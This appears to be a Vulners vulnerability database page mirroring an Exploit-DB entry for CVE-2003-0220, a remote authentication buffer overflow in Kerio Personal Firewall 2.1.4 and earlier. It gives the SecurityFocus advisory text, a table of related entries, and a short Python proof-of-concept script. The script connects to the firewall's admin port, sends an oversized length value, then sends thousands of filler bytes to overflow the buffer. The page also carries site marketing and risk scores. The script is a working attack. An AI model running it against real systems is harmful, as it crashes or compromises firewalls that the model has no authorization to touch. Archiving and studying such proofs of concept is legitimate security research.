Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Kerio Personal Firewall <= 2.1.4 Remote Authentication Packet Over | 28 Feb 200600:00 | – | zdt | |
| CVE-2003-0220 | 15 Jun 201000:00 | – | circl | |
| CVE-2003-0220 | 29 Apr 200304:00 | – | cve | |
| CVE-2003-0220 | 29 Apr 200304:00 | – | cvelist | |
| Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit) | 28 Feb 200600:00 | – | exploitdb | |
| Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit) | 15 Jun 201000:00 | – | exploitdb | |
| Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (2) | 30 Apr 200300:00 | – | exploitdb | |
| Kerio Personal Firewall 2.1.4 - Remote Code Execution | 8 May 200300:00 | – | exploitdb | |
| Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit) | 28 Feb 200600:00 | – | exploitpack | |
| Kerio Personal Firewall Administrator Authentication Handshake Packet Remote Buffer Overflow | 6 May 200300:00 | – | nessus |
10
source: https://www.securityfocus.com/bid/7180/info
A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking.
Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall.
Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.
import os
import socket
import struct
import string
def g():
fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
fd.connect(('192.168.66.160', 44334))
fd.recv(10)
fd.recv(256)
fd.send(struct.pack('!L', 0x149c))
astr = 'A'*0x149c
fd.send(astr)
except Exception, e:
print e
pass
fd.close()
g()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.6909